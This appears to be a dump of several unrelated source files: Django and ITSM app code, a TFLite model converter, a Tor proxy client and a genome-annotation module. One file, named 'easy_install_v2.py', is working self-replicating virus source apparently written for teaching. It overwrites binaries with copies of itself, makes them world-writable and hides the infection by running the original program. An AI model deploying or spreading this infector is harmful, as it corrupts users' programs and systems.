        integer_4 = forms.ChoiceField(choices=get_choices_new_protected(), widget=forms.RadioSelect() )
    app_name = 'discussboard'
    my_title = _(u'Diskussionsforum ändern')
    # Initial form values pulled from the current item/container state.
    data_init = {
        'title' : decode_html(item_container.item.title),
        'nav_title' : decode_html(item_container.container.nav_title),
        'sub_title' : item_container.item.sub_title,
        'text' : remove_link_icons(item_container.item.text),
        'text_more' : remove_link_icons(item_container.item.text_more),
        'image_url' : item_container.item.image_url,
        'image_url_url' : item_container.item.image_url_url,
        'image_extern' : item_container.item.image_extern,
        'is_wide' : item_container.item.is_wide,
        'is_important' : item_container.item.is_important,
        'info_slot_right' : info_slot_to_header(item_container.item.info_slot_right),
        'section' : decode_html(item_container.section),
        'has_comments' : item_container.item.has_comments,
        'has_user_support': item_container.item.has_user_support,
        'is_moderated' : item_container.item.is_moderated,
        'is_browseable' : item_container.is_browseable,
        'visible_start' : item_container.visible_start,
        'visible_end' : item_container.visible_end,
        'integer_4' : item_container.item.integer_4
        }
    if request.method == 'POST' :
        data = request.POST.copy ()
    else :
        data = data_init
    f = dms_itemForm ( data )
    # --- tab order, headings and help texts // special case: start page
    tabs = [
        ('tab_base' , ['title', 'sub_title', 'nav_title', 'section', ]),
        ('tab_intro' , ['text', 'text_more', 'image_url', 'image_url_url', 'image_extern',
                    'is_wide', 'is_important']),
        ('tab_user_support', ['has_user_support', 'integer_4', 'is_moderated', 'has_comments']),
        ('tab_frame' , ['info_slot_right',]),
        ('tab_visibility', ['is_browseable', 'visible_start', 'visible_end',]),
        ]
    content = get_tabbed_form(tabs, help_form, app_name ,f)
    if request.method == 'POST' and not f.errors :
        # Valid POST: persist and redirect back to the board's index page.
        save_values(item_container, data_init, f.data)
        return HttpResponseRedirect(get_site_url(item_container, 'index.html'))
    else :
        vars = get_folderish_vars_edit(request, item_container, app_name, my_title, content, f, get_dont())
        return render_to_response ( 'app/base_edit.html', vars )
| [
"[email protected]"
] | |
99cc6f137b9f513dd32357037e6f41e2231fad35 | 920b9cb23d3883dcc93b1682adfee83099fee826 | /itsm/project/models/base.py | 747edf57e059aed9c831fc4991b3f24c7f758c0a | [
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] | permissive | TencentBlueKing/bk-itsm | f817fb166248d3059857b57d03e8b5ec1b78ff5b | 2d708bd0d869d391456e0fb8d644af3b9f031acf | refs/heads/master | 2023-08-31T23:42:32.275836 | 2023-08-22T08:17:54 | 2023-08-22T08:17:54 | 391,839,825 | 100 | 86 | MIT | 2023-09-14T08:24:54 | 2021-08-02T06:35:16 | Python | UTF-8 | Python | false | false | 2,045 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-ITSM 蓝鲸流程服务 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-ITSM 蓝鲸流程服务 is licensed under the MIT License.
License for BK-ITSM 蓝鲸流程服务:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.db import models
from django.utils.translation import ugettext as _
from itsm.component.constants import LEN_NORMAL
class Model(models.Model):
    """Abstract base model adding common audit fields to ITSM project models.

    Subclasses inherit creator/updater usernames and create/update
    timestamps; ``FIELDS`` lists those field names for reuse (e.g. in
    serializers or admin configuration).
    """
    # Names of the audit fields defined on this base, in a stable order.
    FIELDS = ('creator', 'create_at', 'updated_by', 'update_at')
    # Username of the creator; nullable because records may be created by
    # system processes rather than a logged-in user.
    creator = models.CharField(_("创建人"), max_length=LEN_NORMAL, null=True, blank=True)
    # Set once when the row is first saved (auto_now_add).
    create_at = models.DateTimeField(_("创建时间"), auto_now_add=True)
    # Refreshed on every save (auto_now).
    update_at = models.DateTimeField(_("更新时间"), auto_now=True)
    # Username of the last modifier; nullable for the same reason as creator.
    updated_by = models.CharField(_("修改人"), max_length=LEN_NORMAL, null=True, blank=True)
    class Meta:
        app_label = 'project'
        # Abstract: no table is created for this model itself.
        abstract = True
| [
"[email protected]"
] | |
7faacb9fdcd5f1ce0dc6e1a0c84d359a98b04453 | 3f2d56b2191e0aa0b9bae2f6023deee9f2f444be | /Libs_et_Modules/easy_install_v2.py | 732f9124122e336aff75fb51dd532bace00f6510 | [] | no_license | goffinet/GLMF201 | 8c5a11c7d4a631a95098ae00bc9509929df0a7ca | 0213ca0fe8cb7bdbee54a128788a7d079394afcb | refs/heads/master | 2021-01-21T11:22:50.099598 | 2017-01-18T14:00:14 | 2017-01-18T14:00:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,566 | py | #!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
# Name of the command whose binary is targeted first. ``cmd`` is reassigned
# below when the current target turns out to be already infected.
cmd_init, cmd = ('ls', 'ls')
# Directory of binaries this (educational, proof-of-concept) virus walks.
pathToCorrupt = '/home/tristan/my_bin/'
# Full path of the binary currently selected for infection.
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
    """Return True when *content* is exactly the infection marker line."""
    infection_marker = b'# === INFECTED ===\n'
    return infection_marker == content
def bomb():
    """Harmless logic-bomb payload: just prints a noisy marker."""
    payload = 'BEAAAAAAAAAAH!'
    print(payload)
# Read the currently selected target; its second line tells us whether it
# already carries the infection marker.
with open(fileToCorrupt, 'rb') as currentFile:
    ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
    # Current target is already infected: pick another, not-yet-infected
    # binary from the directory, in random order.
    filenames = os.listdir(pathToCorrupt)
    random.shuffle(filenames)
    for cmd in filenames:
        if cmd != cmd_init:
            with open(pathToCorrupt + cmd, 'rb') as newFile:
                ftcLines = newFile.readlines()
            if not isInfected(ftcLines[1]):
                fileToCorrupt = pathToCorrupt + cmd
                break
    else:
        # for/else: no uninfected binary was found.
        print('All files already corrupted!')
        exit(0)
# ftcLines now holds the raw binary content of the target program.
ftcLines = b''.join(ftcLines)
# Locate the original executable payload embedded in this very script:
# everything after the '# === ORIGINAL ===' marker line below.
with open(argv[0], 'rb') as currentFile:
    content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
    if startOrigin:
        # Strip the leading '# ' so only the base64 payload remains.
        original = content[i][2:]
    else:
        virus.append(content[i])
        if content[i] == b'# === ORIGINAL ===\n':
            startOrigin = True
# 'virus' holds the virus source; 'original' the embedded base64 payload.
# Erase the target, write the virus source in its place, then append the
# target's original binary, base64-encoded, behind the marker comment.
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
    for line in virus:
        currentFile.write(line)
    currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Trigger the logic bomb payload.
bomb()
# Finally, run the original program so the user notices nothing: decode the
# embedded payload into a temporary executable and exec it with our argv.
try:
    if argv[0] != './easy_install_v2.py':
        if original is None:
            original = ftcLines
        temp = tempfile.NamedTemporaryFile(delete=True)
        with open(temp.name, 'wb') as tmpCmdFile:
            tmpCmdFile.write(base64.b64decode(original))
        os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
        temp.file.close()
        os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
    # NOTE(review): bare except deliberately swallows everything so the
    # infected binary never crashes visibly; exits with code 2 instead.
    exit(2)
# === ORIGINAL ===
| [
"[email protected]"
] | |
6da13e87abfd10017f1f682867f5f982147bbccc | f8ff25224bf827406c65560e247e7c3c064cdd38 | /convert_savedmodel_keras_tflite.py | a64597fe955a1644762330369f48a47086e88b20 | [] | no_license | akinoriosamura/PFLD | 893cadbbdc8a7ef424327c814196e1e3608f937f | b3f3c74369c1a8dc4dc0d2e5266dd2b473dfd582 | refs/heads/master | 2021-06-17T15:06:05.468485 | 2020-12-10T09:39:08 | 2020-12-10T09:39:08 | 211,257,866 | 0 | 0 | null | 2019-09-27T07:09:04 | 2019-09-27T07:09:03 | null | UTF-8 | Python | false | false | 468 | py | import tensorflow as tf
# Load the saved Keras model back from the SavedModel directory.
k_model = tf.keras.models.load_model(
    "SavedModelPre",
    custom_objects=None,
    compile=True
)
# k_model = tf.keras.experimental.load_from_saved_model("SavedModelPre")
k_model.summary()
# Re-save as HDF5 with optimizer state dropped, because the TFLite
# converter used below takes a Keras .h5 model file as input.
k_model.save('model.h5', include_optimizer=False)
converter = tf.lite.TFLiteConverter.from_keras_model_file("model.h5")
tflite_model = converter.convert()
# NOTE(review): file handle is not explicitly closed here; this relies on
# CPython refcounting to flush and close the .tflite output.
open("converted_model.tflite", "wb").write(tflite_model)
| [
"[email protected]"
] | |
deb4be375223c47ca23cf76acf8592ff12a33e4b | 6430d2572c4d6dfe41e0e30e725271444cc6f675 | /torsurvey/torapi.py | 6a8d9874f0eeda2ccf1457658601340cd0f124c6 | [] | no_license | nikcub/torsurvey | 5a0c36560801862d5cf1c74f362ae013e0458f27 | 6e9ce5793694857dd5c451905a4a7aa773bfd2b6 | refs/heads/master | 2016-09-05T10:47:13.578465 | 2015-01-27T15:37:07 | 2015-01-27T15:37:07 | 26,388,609 | 1 | 1 | null | 2015-01-27T15:37:07 | 2014-11-09T07:18:27 | Python | UTF-8 | Python | false | false | 1,580 | py | #!/usr/bin/env python
"""
torsurvey.torapi
"""
import requesocks as requests
import requesocks.exceptions
# import hmac
# import hashlib
# import json
import logging
# from time import time
class TorAPI(object):
    """Thin HTTP client that routes GET requests through a Tor SOCKS proxy.

    A ``requesocks`` session is configured with the given SOCKS proxy for
    both http and https traffic.
    """

    # Default headers sent with every request.
    headers = {
        'User-Agent' : 'torsurvey-',
    }

    tor_host = None
    tor_port = None

    # Class-level default proxy map (each instance builds its own in
    # __init__ from the constructor arguments).
    proxy_tor = {
        "http": "socks5://127.0.0.1:9030",
        "https": "socks5://127.0.0.1:9030"
    }

    def __init__(self, proxy_host='127.0.0.1', proxy_port='9040', proxy_type='socks5', timeout=10):
        """Configure the proxied session.

        Args:
            proxy_host: SOCKS proxy host.
            proxy_port: SOCKS proxy port (string or int; coerced to int).
            proxy_type: Proxy scheme, e.g. 'socks5'.
            timeout: Per-request timeout in seconds.
        """
        self.proxy_host = proxy_host
        self.proxy_port = proxy_port
        self.proxy_type = proxy_type
        self.timeout = timeout
        self.proxy = {}
        self.proxy['http'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
        self.proxy['https'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
        self.session = requesocks.session()
        self.session.proxies = self.proxy
        logging.debug("Established session with proxies %s" % str(self.proxy))

    def get_ip(self):
        """Return the apparent external IP as text, or 'Error' on failure."""
        r = self.req('http://ifconfig.me/ip')
        # BUGFIX: req() returns -1 on error; previously this dereferenced
        # r.status_code on the int sentinel and raised AttributeError.
        if r != -1 and r.status_code == 200:
            return r.text
        return 'Error'

    def get_headers(self):
        """Return the headers to send with requests."""
        headers = self.headers
        # @TODO add headers
        return headers

    def req(self, url, extras={}):
        """GET *url* through the proxied session.

        Args:
            url: URL to fetch.
            extras: Unused; kept for interface compatibility.

        Returns:
            The response object on success, or -1 on any error (errors are
            logged, not raised).
        """
        try:
            r = self.session.request('GET', url, allow_redirects=True, timeout=self.timeout, headers=self.headers)
            return r
        except requesocks.exceptions.ConnectionError as e:
            logging.error("Bad connection cannot connect to %s" % url)
            return -1
        except Exception as e:
            logging.error("%s: %s" % (url, e))
            return -1
| [
"[email protected]"
] | |
ae07df2f81bfe910c4ffcfe06f600297235bb252 | c822c6a8941cda6b31b9505372f02b528fed8767 | /pledge/manage.py | 4a5058efe7eab9d9020ac60938e874aef65b13ca | [] | no_license | asim3/kfupm-pledge | b39944c87032325890a1c80ac602bbb12a7e7f58 | 6108a067b225aeeaaff7d82c616099ef5820b3ca | refs/heads/main | 2023-03-08T04:33:28.801450 | 2021-02-17T10:09:45 | 2021-02-17T10:09:45 | 319,908,595 | 0 | 0 | null | 2020-12-19T21:05:44 | 2020-12-09T09:38:57 | Python | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point for Django's command-line administration utility."""
    # Make sure a settings module is configured before Django is imported.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pledge.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    # Invoked directly (``python manage.py <command>``): dispatch to Django.
    main()
| [
"[email protected]"
] | |
2e35a7f0f323931f6f815ef376f0ecbb345c6106 | 19acbc03360d373071a4ddb74855b7087e074089 | /contents/vcf_to_genbank.py | b19dd134ec896769bf2ddcb7d0b86bd81b84afd8 | [] | no_license | glebkuznetsov/recoli_c321d_genome_annotation | 5452d5418e52374c429ac974150f5d0e27e11a93 | 25f3caba9d62f7741cebcdbb3eeefd831f703f2b | refs/heads/master | 2021-05-28T01:11:27.200718 | 2014-12-01T06:13:00 | 2014-12-01T06:13:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,947 | py | """
Methods for impressing the changes in a VCF file onto an existing
Genbank file.
NOTES:
* Look into insertion annotations being 1 off (specifically galk insertion at SIR.30.31i
* Annotation of deletion d_mg1655_66564_66733 partial deletion of repeat region 66564 66733 seems to be one off.
"""
import copy
import csv
import os
import pickle
from Bio import SeqIO
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from Bio.SeqRecord import SeqRecord
import vcf
from biopython_util import add_feature_to_seq_record
from biopython_util import delete_interval
from biopython_util import insert_sequence_and_update_features
from refactor_config import GENOMES_DIR
###############################################################################
# File locations
###############################################################################
# Root directory holding the rec1_c321d genome data files.
REC1_C321D_ROOT = os.path.join(GENOMES_DIR, 'rec1_c321d')
###############################################################################
# Constants
###############################################################################
# Genbank feature type used for annotations that mark applied variants.
VARIANT_ANNOTATION_TYPE = 'variation'
# Longest ref sequence stored verbatim in a feature's 'replace' qualifier;
# longer refs are summarized (e.g. '15 base replacement') for readability.
MAX_REPLACE_CHARS = 12
###############################################################################
# Helper objects used by the main procedure
###############################################################################
class RuntimeLiftover(object):
    """Object that aids in dynamically updating a genome record with a list of
    positions that are relative to the original genome record.

    An example of a case where this is useful is when you are creating a
    mapping from a vcf record which shows SNPs and other variants relative
    to a reference genome.

    For example, say you have two insertions:
        * A - position: 100, size: 3
        * B - position: 200, size: 4
    When we introduce the first insertion, the frame of the underlying genome
    has shifted, so that the second insertion should really be added at
    position 200 + 3.
    """

    def __init__(self, original_genome_record):
        """Constructor.

        Args:
            original_genome_record: The unmodified record that all source
                coordinates refer to. Only its length is used internally.
        """
        # The original record. This remains unchanged throughout the
        # mapping process.
        # TODO: Do we even need to be keeping track of this? Or are intervals
        # sufficient?
        self.source_genome_record = original_genome_record

        # Structure that maintains the mapping of intervals.
        # Let's say we guarantee that it's sorted and exclusive, for now.
        # NOTE: Each interval maintains a one-to-one mapping and so is
        # inclusive bounds on both ends.
        self._interval_mapping = self._initialize_interval_mapping()

    def _initialize_interval_mapping(self):
        """Initializes the interval mapping.

        The initial state maps the whole source interval onto itself.
        """
        # The initial mapping is a list with a single element, which is
        # a pair of tuples representing the correspondence between the original
        # whole sequence interval and a copy of itself.
        original_interval = (0, len(self.source_genome_record) - 1)
        initial_mapping_pair = (original_interval, copy.copy(original_interval))
        return [initial_mapping_pair]

    @classmethod
    def from_pickled_intervals(cls, original_genome_record, pickle_dest):
        """Factory method that creates a RuntimeLiftover object and sets
        the intervals from a pickle file.

        The original genome record still has to be provided.
        """
        runtime_liftover = cls(original_genome_record)
        with open(pickle_dest) as pickle_fh:
            runtime_liftover._interval_mapping = pickle.load(pickle_fh)
        return runtime_liftover

    def pickle_interval_mapping(self, pickle_dest):
        """Pickle the interval mapping and write to file.

        This is useful for debugging intervals and developing other output
        formats.
        """
        with open(pickle_dest, 'w') as pickle_fh:
            pickle.dump(self._interval_mapping, pickle_fh)

    def write_chain_file(self, chain_file_dest):
        """Writes the current state of _interval_mapping in the UCSC
        liftover chain file format.

        See: http://genome.ucsc.edu/goldenPath/help/chain.html
        """
        with open(chain_file_dest, 'w') as chain_file_fh:
            # Write the heading.
            chain_file_fh.write('chain\n')
            # Each row is of the form 'size dt dq', separated by spaces.
            # * size: the size of the ungapped alignment
            # * dt: the difference between the end of this block and the
            #       beginning of the next block (reference sequence)
            # * dq: the difference between the end of this block and the
            #       beginning of the next block (query sequence)
            # NOTE: The last line of the alignment section contains only one
            # number: the ungapped alignment size of the last block.
            interval_index = 0
            num_interval_mappings = len(self._interval_mapping)
            for interval_index in range(num_interval_mappings):
                # I am using the names '*reference*' and '*query*' in the sense
                # that the chain file uses them, where query sequence is the one
                # whose coordinates we are generally trying to convert into the
                # frame of the target. Typically the query sequence is the one
                # we mapped the VCF changes on top of.
                (current_reference_interval, current_query_interval) = (
                        self._interval_mapping[interval_index])
                size = bases_in_interval(current_reference_interval)
                next_interval_index = interval_index + 1
                if next_interval_index < num_interval_mappings:
                    (next_reference_interval, next_query_interval) = (
                            self._interval_mapping[next_interval_index])
                    dt = (next_reference_interval[0] -
                            current_reference_interval[1] - 1)
                    dq = (next_query_interval[0] -
                            current_query_interval[1] - 1)
                    chain_file_fh.write('%d %d %d\n' % (size, dt, dq))
                else:
                    # This is the last line. Just write the block size.
                    chain_file_fh.write('%d\n' % (size,))

    def convert_source_position_to_target(self, source_position, or_next=False):
        """Converts a single position in the source genome to the corresponding
        position in the target genome (the one being updated).

        Args:
            source_position: Position in the source genome. (0-indexed).
            or_next: If True, when no direct mapping, return the next position.

        Returns:
            The position in the target genome, or None if mapping failed.
        """
        assert isinstance(source_position, int), "source_position must be int."
        # For now, the algorithm is to first search every interval in the
        # internal interval mapping data structure until we find the one that
        # the source position lies in, and then find the corresponding target
        # position by using the relative offset of the source position within
        # the interval.
        for mapping_index in xrange(len(self._interval_mapping)):
            source_interval, target_interval = self._interval_mapping[
                    mapping_index]
            if source_interval[0] <= source_position <= source_interval[1]:
                interval_index = source_position - source_interval[0]
                return target_interval[0] + interval_index
            # Position falls in a gap (deleted region): optionally map to the
            # start of the next surviving source interval.
            if or_next and source_position < source_interval[0]:
                return self.convert_source_position_to_target(
                        source_interval[0], or_next=or_next)
        return None

    def convert_target_position_to_source(self, target_position):
        """Converts a single position in the target genome to the corresponding
        position in the source genome (the one being updated).

        Similar, but more limited than convert_source_position_to_target().

        Args:
            target_position: Position in the target genome. (0-indexed).

        Returns:
            The position in the source genome, or None if mapping failed.
        """
        assert isinstance(target_position, int), "target_position must be int."
        for mapping_index in xrange(len(self._interval_mapping)):
            source_interval, target_interval = self._interval_mapping[
                    mapping_index]
            if target_interval[0] <= target_position <= target_interval[1]:
                interval_index = target_position - target_interval[0]
                return source_interval[0] + interval_index
        return None

    def handle_insertion(self, variant_data):
        """Handles an insertion with the given data spec.

        Splits the interval containing the insertion point and shifts all
        downstream target intervals right by the insertion length.

        Args:
            variant_data: Dictionary with keys:
                * position: Source-genome position of the insertion.
                * sequence: The inserted sequence.
        """
        # Create a new interval mapping and replace the member attribute
        # at the end.
        new_interval_mapping = []

        # Parse the insert data object.
        insert_position = variant_data['position']
        insert_sequence = variant_data['sequence']
        len_insert_sequence = len(insert_sequence)

        # We use a state machine strategy to first find the interval
        # to insert, and then update all downstream target intervals.
        STATE_SEARCHING = 'SEARCHING'
        STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
        state = STATE_SEARCHING
        for idx, (source_interval, target_interval) in enumerate(
                self._interval_mapping):
            if state == STATE_SEARCHING:
                if source_interval[0] <= insert_position <= source_interval[1]:
                    insert_position_index = insert_position - source_interval[0]
                    # The source simply gets split.
                    new_source_interval_upstream = (source_interval[0],
                            insert_position - 1)
                    new_source_interval_downstream = (insert_position,
                            source_interval[1])
                    # The target gets split, with the downstream interval
                    # shifted by the size of the insertion sequence.
                    new_target_interval_upstream = (target_interval[0],
                            target_interval[0] + insert_position_index - 1)
                    new_target_interval_downstream = (target_interval[0] +
                            insert_position_index + len_insert_sequence,
                            target_interval[1] + len_insert_sequence)
                    # Append the split sequence pairs.
                    new_interval_mapping.append((new_source_interval_upstream,
                            new_target_interval_upstream))
                    new_interval_mapping.append((new_source_interval_downstream,
                            new_target_interval_downstream))
                    # Update the state for remaining iterations.
                    state = STATE_UPDATING_TARGET_DOWNSTREAM
                elif insert_position < source_interval[0]:
                    # The insert_position was deleted. Shift the target
                    # interval downstream by the size of the insertion.
                    new_source_interval = (
                            source_interval[0],
                            source_interval[1])
                    new_target_interval = (
                            target_interval[0] + len(insert_sequence),
                            target_interval[1] + len(insert_sequence))
                    assert (bases_in_interval(new_source_interval) ==
                            bases_in_interval(new_target_interval))
                    new_interval_mapping.append((new_source_interval,
                            new_target_interval))
                    state = STATE_UPDATING_TARGET_DOWNSTREAM
                else:
                    new_interval_mapping.append(
                            (source_interval, target_interval))
            else:
                # Shift all remaining target intervals.
                new_target_interval = (
                        target_interval[0] + len_insert_sequence,
                        target_interval[1] + len_insert_sequence)
                new_interval_mapping.append((source_interval,
                        new_target_interval))
        if state == STATE_SEARCHING:
            # NOTE(review): The format string is never interpolated here --
            # RuntimeError receives two separate args rather than a
            # %-formatted message. Harmless but ugly error output.
            raise RuntimeError("Error updating RuntimeLiftover with %s", (
                    str(variant_data,)))
        self._interval_mapping = new_interval_mapping

    def handle_deletion(self, variant_data):
        """Handles a deletion with the given data spec.

        Args:
            variant_data: Dictionary with keys:
                * interval: A two-tuple representing pythonic interval for the
                    deletion, i.e. (inclusive_start, exclusive_end).
                    e.g. (100, 102) is a deletion of the 2 bases at positions
                    100 and 101. Relative to the source genome.
        """
        interval = variant_data['interval']
        # NOTE(review): The loop below discards its result: delete_position
        # is unconditionally overwritten with interval[0] afterwards, and
        # only a single base (delete_interval_size = 1) is processed per
        # call. Looks like dead code / incomplete multi-base support --
        # TODO confirm against callers.
        for source_position in range(*interval):
            delete_position = self.convert_source_position_to_target(
                    source_position, or_next=True)
        delete_position = interval[0]
        delete_interval_size = 1

        # Create a new interval mapping and replace the member attribute
        # at the end.
        new_interval_mapping = []

        # We use a state machine strategy to first find the interval
        # to delete, and then update all downstream target intervals.
        STATE_SEARCHING = 'SEARCHING'
        STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
        state = STATE_SEARCHING
        for source_interval, target_interval in self._interval_mapping:
            if state == STATE_SEARCHING:
                if source_interval[0] <= delete_position <= source_interval[1]:
                    delete_position_index = delete_position - source_interval[0]
                    # The source simply gets split, dropping a base.
                    new_source_interval_upstream = (source_interval[0],
                            delete_position - 1)
                    new_source_interval_downstream = (
                            delete_position + delete_interval_size,
                            source_interval[1])
                    # The target gets split, including the position, but
                    # reducing the size of this and all following intervals.
                    new_target_interval_upstream = (target_interval[0],
                            target_interval[0] + delete_position_index - 1)
                    new_target_interval_downstream = (
                            target_interval[0] + delete_position_index,
                            target_interval[1] - delete_interval_size)
                    # Append the split sequence pairs.
                    new_interval_mapping.append((new_source_interval_upstream,
                            new_target_interval_upstream))
                    new_interval_mapping.append((new_source_interval_downstream,
                            new_target_interval_downstream))
                    # Update the state for remaining iterations.
                    state = STATE_UPDATING_TARGET_DOWNSTREAM
                elif delete_position < source_interval[0]:
                    # The interval this delete_position would have fallen
                    # into has been deleted, effectively delete the first
                    # position in this current interval.
                    new_source_interval = (source_interval[0] + 1,
                            source_interval[1])
                    new_target_interval = (target_interval[0],
                            target_interval[1] - 1)
                    new_interval_mapping.append((new_source_interval,
                            new_target_interval))
                    state = STATE_UPDATING_TARGET_DOWNSTREAM
                else:
                    new_interval_mapping.append(
                            (source_interval, target_interval))
            else: # state == STATE_UPDATING_TARGET_DOWNSTREAM
                # Shift all remaining target intervals.
                new_target_interval = (
                        target_interval[0] - delete_interval_size,
                        target_interval[1] - delete_interval_size)
                new_interval_mapping.append(
                        (source_interval, new_target_interval))
        if state == STATE_SEARCHING:
            raise RuntimeError("Error updating RuntimeLiftover for %s" % (
                    str(variant_data,)))
        self._interval_mapping = new_interval_mapping
def bases_in_interval(interval):
    """Number of bases covered by a liftover interval.

    Liftover intervals are inclusive at both ends (not Pythonic half-open
    ranges), so an interval like (5, 5) covers exactly one base.
    """
    start, end = interval[0], interval[1]
    return end - start + 1
class VCFToGenbankMaker(object):
"""Object that encapsulates the logic for updating a genbank file
with changes from a vcf file.
Usage:
1. Construct an instance according to the constructor signature.
2. Call run().
"""
    def __init__(self, genome_record, vcf_path, sample_id,
            manual_updates_filepath=None):
        """Constructor.

        Args:
            genome_record: SeqRecord that is mutated in place as variants are
                applied; a deep copy is retained as the unmodified source.
            vcf_path: Path to the .vcf file with the variant calls.
            sample_id: Id of the single sample (column) in the vcf to apply.
            manual_updates_filepath: Optional path to a tab-separated file of
                manual updates applied before the vcf records (see
                handle_manual_updates()).
        """
        # Keep a copy of the original genome record.
        self.original_genome_record = copy.deepcopy(genome_record)

        # The record that is mutated as we progress.
        self.genome_record = genome_record

        # Save the path to the vcf. We'll use the vcf.Reader stream reader
        # object when we actually need to handle it.
        self.vcf_path = vcf_path

        # The specific sample in the vcf.
        self.sample_id = sample_id

        # Location with manual updates. Might be None.
        self.manual_updates_filepath = manual_updates_filepath

        # Object used to track the dynamically changing interval mapping
        # positions in the original genome record with respect to which
        # vcf positions were identified to the most up-to-date genome.
        self.runtime_liftover = RuntimeLiftover(self.original_genome_record)
    def run(self, verbose=False, log_file=None):
        """Performs the actual updating.

        Order of operations: TAG annotations first, then manual updates (if
        configured), then every called record in the vcf for the configured
        sample.

        Args:
            verbose: If True, print progress to stdout.
            log_file: Optional path; when given, the vcf POS values that
                actually changed the genome are written one per line.
        """
        # Manually add annotations for TAG.
        add_TAG_annotations(self.genome_record)

        # Add changes made manually.
        if self.manual_updates_filepath:
            if verbose: print '...Handling manual updates...'
            self.handle_manual_updates()
            if verbose: print '...Done handling manual updates.'

        # Extra data to add to features.
        position_to_data_map = get_vcf_metadata()

        # Keep track of which vcf changes were actually made.
        vcf_positions_updated = []

        if verbose: print 'Handling vcf...'
        with open(self.vcf_path) as vcf_fh:
            vcf_reader = vcf.Reader(vcf_fh)
            sample_index = vcf_reader.samples.index(self.sample_id)
            for idx, record in enumerate(vcf_reader):
                if verbose: print idx, record
                # NOTE(review): the metadata lookup is currently disabled;
                # every record is handled with metadata=None.
                # metadata = position_to_data_map.get(record.POS, None)
                metadata = None
                was_change_made = self.handle_vcf_record(
                        record, sample_index, metadata)
                assert isinstance(was_change_made, bool), (
                        "handle_vcf_record() must return a boolean.")
                if was_change_made:
                    vcf_positions_updated.append(record.POS)

        # Write debug output for which changes were actually made.
        if log_file:
            with open(log_file, 'w') as log_fh:
                for pos in vcf_positions_updated:
                    log_fh.write(str(pos) + '\n')
def handle_manual_updates(self):
"""Adds manual updates from an external file with the following
tab-separated fields:
* Cassette
* Comment
* LP
* RP
* Sequence
"""
assert self.manual_updates_filepath, "No manual updates specified."
with open(self.manual_updates_filepath) as fh:
line = fh.readline() # Skip the header.
line = fh.readline()
while line:
# Parse the arguments.
args = line.split('\t')
if not len(args) >= 3:
line = fh.readline()
continue
fix_id = args[0]
note = args[1]
left_bp = int(args[2].strip())
right_bp = int(args[3].strip())
if len(args) == 5 and len(args[4].strip()):
seq = args[4].strip()
else:
seq = None
# Process the args to get the data necessary to make the update.
pythonic_start = left_bp - 1
pythonic_end = right_bp - 1
ref = str(self.original_genome_record.seq[
pythonic_start:pythonic_end])
if seq:
alt = seq
else:
alt = ''
# Make the update for this record.
self._update_genome_record_for_variant(
pythonic_start, ref, alt, note)
# Continue to next line.
line = fh.readline()
# def add_cassette_modifications(self, cassette_modifications_csv):
# """Method that allows adding modifications to a cassette relative
# to the starting position of the cassette.
# This might be desired where the cassettes come from some canonical
# source, but in the current context they have modifications.
# Args:
# cassette_modifications_csv: List of modifications to make, described
# with the following columns:
# * cassette_id: Unique id for the cassette as provided in the
# manual updates file.
# * comment
# * position: 1-based index of the mutation start.
# * ref: What was there previously.
# * alt: The alternate value for the position. Currently in
# vcf output format with square brackets.
# """
# with open(variant_data_csv) as csv_fh:
# csv_reader = csv.DictReader(csv_fh)
# for row in csv_reader:
# pass
    def update_from_variant_data_csv(self, variant_data_csv):
        """Updates the genome given a list of variants in a csv.

        Args:
            variant_data_csv: Path to .csv file containing the following cols:
                Required:
